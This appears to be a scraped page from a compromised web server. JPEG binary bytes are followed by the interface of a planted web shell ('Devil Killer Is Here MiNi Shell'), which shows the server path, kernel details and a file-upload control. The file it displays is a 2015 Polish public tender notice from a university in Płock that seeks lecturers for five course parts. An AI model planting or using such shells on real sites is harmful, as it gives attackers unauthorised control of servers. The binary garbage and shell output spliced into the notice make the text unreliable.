JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151120/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151120/170679-N-2015.html

<p class="kh_header"><b>Płock: Świadczenie usług edukacyjnych osób dorosłych na poziomie akademickim w ramach Instytutu Nauk o Zdrowiu oraz Instytutu Nauk Humanistycznych i Społecznych Państwowej Wyższej Szkoły Zawodowej w Płocku</b><br>
<b>Numer ogłoszenia: 170679 - 2015; data zamieszczenia: 20.11.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Państwowa Wyższa Szkoła Zawodowa w Płocku , Pl. Dąbrowskiego 2, 09-402 Płock, woj. mazowieckie, tel. 24 3665400, faks 24 3665421.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pwszplock.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług edukacyjnych osób dorosłych na poziomie akademickim w ramach Instytutu Nauk o Zdrowiu oraz Instytutu Nauk Humanistycznych i Społecznych Państwowej Wyższej Szkoły Zawodowej w Płocku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Instytut Nauk 
Humanistycznych i Społecznych
Kierunek studiów - Pedagogika
Część 1
Przeprowadzenie zajęć przedmiotu: Wybrane elementy samoobrony, kierunek studiów: Pedagogika, specjalność: Edukacja obronna z bezpieczeństwem wewnętrznym, studia stacjonarne, w formie ćwiczeń, w wymiarze godzin: 45 (3 grupy x 15 godzin), zakończonych zaliczeniem z oceną, rok II/semestr IV.

Wykonawca musi posiadać:
- ukończone studia magisterskie,
- kwalifikacje instruktora judo/samoobrony,
- minimum trzyletnie doświadczenie w prowadzeniu zajęć z młodzieżą,


Instytut Nauk o Zdrowiu
Kierunek studiów - Pielęgniarstwo
Część 2
Przeprowadzenie 1 godziny zajęć przedmiotu Pielęgniarstwo w zagrożeniu życia w formie ćwiczeń, zakończonych zaliczeniem z oceną - II rok studiów/ III semestr - studia stacjonarne.

Wykonawca musi posiadać:
- prawo wykonywania zawodu pielęgniarki,
- tytuł minimum mgr pielęgniarstwa,
- minimum 5 lat stażu pracy w zawodzie, 
- specjalizację w dziedzinie Pielęgniarstwa anestezjologicznego i intensywnej opieki,
- staż pracy w systemie ratownictwa medycznego i oddziale intensywnej terapii,
- doświadczenie dydaktyczne w realizacji przedmiotu.
Publikacje tematyczne będą mile widziane.

Część 3
Przeprowadzenie 26 godzin zajęć przedmiotu Psychiatria w formie wykładów, zakończonych zaliczeniem z oceną - III rok studiów/V semestr - studia stacjonarne.

Wykonawca musi posiadać:
-	posiadanie prawa wykonywania zawodu lekarza,
-	posiadanie tytułu profesora w zakresie nauk medycznych,
-	posiadanie tytułu lekarza specjalisty w zakresie psychiatrii,
-	minimum 10 lat stażu pracy w zawodzie lekarza,
-	minimum 5 lat stażu pracy w psychiatrii.
Publikacje w zakresie psychiatrii będą mile widziane.
Część 4
Przeprowadzenie 39 godzin zajęć przedmiotu Zakażenia szpitalne w formie ćwiczeń, zakończonych zaliczeniem z oceną  - I rok studiów/ II semestr - studia stacjonarne

Wykonawca musi posiadać:
-	prawo wykonywania zawodu pielęgniarki,
-	minimum wykształcenia wyższego magisterskiego w zakresie zdrowia publicznego,
-	tytułu specjalisty w dziedzinie pielęgniarstwa epidemiologicznego,
-	minimum 10 lat stażu pracy w zawodzie pielęgniarki,
-	minimum 5 lat stażu pracy na stanowisku specjalisty ds. epidemiologii,
-	doświadczenie dydaktyczne w realizacji przedmiotu,
Publikacje na temat zakażeń szpitalnych będą mile widziane.

Kierunek studiów - Kosmetologia
Część 5
Przeprowadzenie zajęć przedmiotu Podologia na studiach stacjonarnych, rok akademicki 2015/2016, rok III/semestr VI w formie:
- wykładów zakończonych zaliczeniem z oceną w wymiarze godzin: 15
- ćwiczeń zakończonych zaliczeniem z oceną w wymiarze godzin: 90.

Wykonawca musi posiadać:
-	minimum wykształcenie wyższe magisterskie w zakresie kosmetologii;
-	staż pracy w zakresie kosmetologii minimum 2 lata,
-	doświadczenie zawodowe w zakresie kosmetologii nabyte w okresie ostatnich 5-ciu lat;
-	ukończone szkolenia w zakresie zabiegów podologicznych potwierdzone certyfikatami (do wglądu przed podpisaniem umowy).
Publikacje tematyczne będą mile widziane.

Informacje ogólne:
1)	Poprzez zajęcia strony rozumieją w szczególności: wykłady, ćwiczenia, seminaria, konwersatoria. Integralną częścią wykonywanych zajęć są: konsultacje (1 godzina tygodniowo), dyżury dydaktyczne, przeprowadzanie egzaminów, sprawdzanie prac kontrolnych studentów oraz udzielanie zaliczeń z przedmiotu - za wykonywanie czynności będących integralną częścią zajęć nie przysługuje dodatkowe wynagrodzenie.
2)	Harmonogram zajęć na kursie zostanie przekazany Wykonawcy po podpisaniu umowy.
3)	Zajęcia na studiach stacjonarnych trwają od poniedziałku do piątku w godz. od 8:00 do 20:00, z tym, że plan zajęć ustala Zamawiający. Wykonawca usługi musi się dostosować do planu zajęć opracowanego przez Zamawiającego.
4)	1 godzina określona w opisie przedmiotu zamówienia to 45 min.
5)	Zajęcia na studiach niestacjonarnych trwają w soboty, niedziele w godzinach od 8:00 do 20:00, z tym że terminy zjazdów ustala Zamawiający. Plan zajęć ustala Zamawiający. Wykonawca usługi musi się dostosować do planu zajęć opracowanego przez Zamawiającego. 
6)	Szczegółowy harmonogram zajęć dla każdej części zamówienia zostanie ustalony przez Zamawiającego i Wykonawcę w ciągu 5 dni od dnia podpisania umowy.
7)	Wykonawca usługi musi także w cenie usługi przeprowadzić zaliczenia i egzaminy zgodnie z harmonogramem sesji.
8)	Wykonawca jest zobowiązany do przygotowania i przeprowadzenia dokumentacji przebiegu zajęć zgodnie z zasadami ustalonymi przez Zamawiającego oraz ją udostępniać na żądanie Zamawiającego.
9)	Wykonawca zobowiązany jest do aktualizacji efektów kształcenia, sylabusów i programów kształcenia dla realizowanych zajęć zgodnie  z obowiązującym prawem.
10)	Wykonawca jest zobowiązany po podpisaniu umowy skontaktować się z Sekretariatem Instytutu Nauk o Zdrowiu PWSZ w Płocku.
11)	Zamawiający zastrzega sobie możliwość przeprowadzenia hospitacji i innych form oceny jakości kształcenia zajęć prowadzonych przez Wykonawcę.
12)	Wykonawca jest zobowiązany do przeprowadzenia zajęć w wymiarze wynikającym z opisu przedmiotu zamówienia (umowy), natomiast zajęcia niezrealizowane z powodu nieobecności (planowanych i nieplanowanych - wynikających np. ze zwolnień lekarskich, wyjazdów, konferencje itp.) muszą być wykonane w innym terminie uzgodnionym z Działem Spraw Studenckich i Dydaktyki Zamawiającego w trakcie trwania umowy.
13)	Zamawiający nie będzie ponosił kosztów za dojazd Wykonawcy do miejsca, w którym będą przeprowadzane zajęcia.
14)	Zamawiający zapewni sale, w których będą przeprowadzane wykłady/ćwiczenia oraz listę obecności dla Wykonawcy..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>W przypadku Instytutu Nauk o Zdrowiu Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 Ustawy Pzp. Zamówienia uzupełniające będą stanowiły nie więcej niż  50% wartości zamówienia podstawowego i będą polegały na powtórzeniu tego samego rodzaju zamówienia.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.43.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium  w niniejszym postępowaniu</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ze złożonych dokumentów i oświadczeń musi wynikać, iż prowadzący zajęcia posiada:
Dla części 1
- ukończone studia magisterskie,
- posiadanie kwalifikacji instruktora judo/samoobrony,
- minimum trzyletnie doświadczenie w prowadzeniu zajęć z młodzieżą,

Dla Części 2
-	posiadanie prawa wykonywania zawodu pielęgniarki,
-	posiadanie minimum tytułu magistra pielęgniarstwa,
-	posiadanie minimum 5 lat stażu pracy w zawodzie, 
-	posiadanie specjalizacji w dziedzinie pielęgniarstwa anestezjologicznego i intensywnej opieki,
-	staż pracy  systemie ratownictwa medycznego i oddziale intensywnej terapii,
-	doświadczenie dydaktyczne w realizacji przedmiotu.

Dla Części 3
-	posiadanie prawa wykonywania zawodu lekarza,
-	posiadanie tytułu profesora w zakresie nauk medycznych,
-	posiadanie tytułu lekarza specjalisty w zakresie psychiatrii,
-	minimum 10 lat stażu pracy w zawodzie lekarza,
-	minimum 5 lat stażu pracy w psychiatrii.

Dla Części 4
-	posiadanie prawa wykonywania zawodu pielęgniarki,
-	posiadanie minimum wykształcenia wyższego magisterskiego w zakresie zdrowia publicznego,
-	posiadanie tytułu specjalisty w dziedzinie pielęgniarstwa epidemiologicznego,
-	minimum 10 lat stażu pracy w zawodzie pielęgniarki,
-	minimum 5 lat stażu pracy na stanowisku specjalisty ds. epidemiologii,
-	doświadczenie dydaktyczne w realizacji przedmiotu,

Dla Części 5
-	posiadanie minimum wykształcenia wyższego magisterskiego w zakresie kosmetologii,
-	posiadanie doświadczenia zawodowego w zakresie kosmetologii nabytego w okresie ostatnich pięciu lat, 
-	staż pracy w zakresie kosmetologii minimum 2 lata,
-	ukończenie szkoleń w zakresie zabiegów podologicznych potwierdzone certyfikatami (do wglądu przed podpisaniem umowy).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Inne dokumenty
1.	Formularz ofertowy - Załącznik nr 1
2.	Pełnomocnictwo /oryginał lub kopia poświadczona notarialnie/ osoby lub osób podpisujących ofertę - jeżeli uprawnienie do podpisu nie wynika bezpośrednio z załączonych dokumentów.
3.	W przypadku złożenia oferty wspólnej - pełnomocnictwo udzielone liderowi /patrz Rozdział III pkt 8/.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Strony dopuszczają możliwość dokonania w umowie następujących zmian:
a)	zmiany wysokości wynagrodzenia, w przypadku ustawowej zmiany podatku VAT,
b)	zmniejszenia do 50% wartości realizowanego zamówienia w przypadku zmniejszenia ilości godzin dydaktycznych, a tym samym wynagrodzenia,
c)	zmiany harmonogramu realizacji zajęć (zmiany w kolejności i terminach realizacji zamówienia) w przypadku wystąpienia takiej konieczności,
d)	przedłużenia terminu umowy w przypadku zmian w organizacji procesu dydaktycznego,
e)	obniżenia ilość/wielkości przedmiotu zamówienia i tym samym wynagrodzenia Wykonawcy, wynikające z zaistnienia obiektywnych przesłanek konieczności takiej zmiany. Rozliczenie  zostanie dokonane w oparciu o koszt 1 godziny, podanej w formularzu ofertowym stanowiącym Załącznik Nr 1 do SIWZ,
f)	aktualizacji sposobu i zakresu prowadzonych zajęć ze względu np. na zmiany obowiązujących przepisów,
g)	terminu realizacji przedmiotu umowy w przypadku wystąpienia poniższych okoliczności:
- zaistnienie działań wojennych, aktów terroryzmu, rewolucji, przewrotu wojskowego lub cywilnego, wojny domowej, skażeń radioaktywnych,
- zaistnienie klęski żywiołowej, jak huragany, powodzie, trzęsienia ziemi, bunty, niepokoje, strajki,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pwszplock.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Państwowa Wyższa Szkoła Zawodowa w Płocku, Pl. Dąbrowskiego 2, pok.B 116.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.11.2015 godzina 09:45, miejsce: Państwowa Wyższa Szkoła Zawodowa w Płocku, Pl. Dąbrowskiego 2, Sekretariat Kanclerza i Kwestora, pok.B 202.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 10.	Osobami uprawnionymi do porozumiewania się z Wykonawcami są:
-	dr Kinga Przybyszewska - Instytut Nauk Humanistycznych i Społecznych, tel. 24 366 54 10 w godz. pracy Uczelni w zakresie opisu przedmiotu zamówienia dot. Części 1,
-	mgr Monika Ludwikowska - Instytut Nauk o Zdrowiu, tel. 24 366 54 00 wew. 204 w godz. pracy Uczelni w zakresie opisu przedmiotu zamówienia dot. Części nr 2-5
-	mgr Maria Banaszewska - Sekcja Zamówień Publicznych i Umów, tel. 24 366-54-00 wew. 241 w godz. pracy Uczelni w zakresie proceduralnym i formalnym..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Świadczenie usług edukacyjnych osób dorosłych na poziomie akademickim w ramach  Instytutu Nauk Humanistycznych i Społecznych Państwowej Wyższej Szkoły Zawodowej w Płocku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Instytut Nauk 
Humanistycznych i Społecznych
Kierunek studiów - Pedagogika
Część 1
Przeprowadzenie zajęć przedmiotu: Wybrane elementy samoobrony, kierunek studiów: Pedagogika, specjalność: Edukacja obronna z bezpieczeństwem wewnętrznym, studia stacjonarne, w formie ćwiczeń, w wymiarze godzin: 45 (3 grupy x 15 godzin), zakończonych zaliczeniem z oceną, rok II/semestr IV.

Wykonawca musi posiadać:
- ukończone studia magisterskie,
- kwalifikacje instruktora judo/samoobrony,
- minimum trzyletnie doświadczenie w prowadzeniu zajęć z młodzieżą,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.43.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 22.02.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Doświadczenie - w prowadzeniu zajęć z młodzieżą - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Świadczenie usług edukacyjnych osób dorosłych na poziomie akademickim w ramach Instytutu Nauk o Zdrowiu Państwowej Wyższej Szkoły Zawodowej w Płocku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Instytut Nauk o Zdrowiu
Kierunek studiów - Pielęgniarstwo
Część 2
Przeprowadzenie 1 godziny zajęć przedmiotu Pielęgniarstwo w zagrożeniu życia w formie ćwiczeń, zakończonych zaliczeniem z oceną - II rok studiów/ III semestr - studia stacjonarne.

Wykonawca musi posiadać:
- prawo wykonywania zawodu pielęgniarki,
- tytuł minimum mgr pielęgniarstwa,
- minimum 5 lat stażu pracy w zawodzie, 
- specjalizację w dziedzinie Pielęgniarstwa anestezjologicznego i intensywnej opieki,
- staż pracy w systemie ratownictwa medycznego i oddziale intensywnej terapii,
- doświadczenie dydaktyczne w realizacji przedmiotu.
Publikacje tematyczne będą mile widziane..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.43.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 26.09.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Doświadczenie - staż pracy w zawodzie - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Świadczenie usług edukacyjnych osób dorosłych na poziomie akademickim w ramach Instytutu Nauk o Zdrowiu Państwowej Wyższej Szkoły Zawodowej w Płocku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Instytut Nauk o Zdrowiu
Kierunek studiów - Pielęgniarstwo
Przeprowadzenie 26 godzin zajęć przedmiotu Psychiatria w formie wykładów, zakończonych zaliczeniem z oceną - III rok studiów/V semestr - studia stacjonarne.

Wykonawca musi posiadać:
-	posiadanie prawa wykonywania zawodu lekarza,
-	posiadanie tytułu profesora w zakresie nauk medycznych,
-	posiadanie tytułu lekarza specjalisty w zakresie psychiatrii,
-	minimum 10 lat stażu pracy w zawodzie lekarza,
-	minimum 5 lat stażu pracy w psychiatrii.
Publikacje w zakresie psychiatrii będą mile widziane..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.43.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 26.09.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Doświadczenie - staż pracy w psychiatrii - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Świadczenie usług edukacyjnych osób dorosłych na poziomie akademickim w ramach Instytutu Nauk o Zdrowiu Państwowej Wyższej Szkoły Zawodowej w Płocku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Instytut Nauk o Zdrowiu
Kierunek studiów - Pielęgniarstwo
Część 4
Przeprowadzenie 39 godzin zajęć przedmiotu Zakażenia szpitalne w formie ćwiczeń, zakończonych zaliczeniem z oceną  - I rok studiów/ II semestr - studia stacjonarne
Wykonawca musi posiadać:
-	prawo wykonywania zawodu pielęgniarki,
-	minimum wykształcenia wyższego magisterskiego w zakresie zdrowia publicznego,
-	tytułu specjalisty w dziedzinie pielęgniarstwa epidemiologicznego,
-	minimum 10 lat stażu pracy w zawodzie pielęgniarki,
-	minimum 5 lat stażu pracy na stanowisku specjalisty ds. epidemiologii,
-	doświadczenie dydaktyczne w realizacji przedmiotu,
Publikacje na temat zakażeń szpitalnych będą mile widziane..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.43.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 26.09.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Doświadczenie -staż pracy na stanowisku specjalisty ds. epidemiologii - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Świadczenie usług edukacyjnych osób dorosłych na poziomie akademickim w ramach Instytutu Nauk o Zdrowiu Państwowej Wyższej Szkoły Zawodowej w Płocku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Instytut Nauk o Zdrowiu
Kierunek studiów - Kosmetologia
Część 5
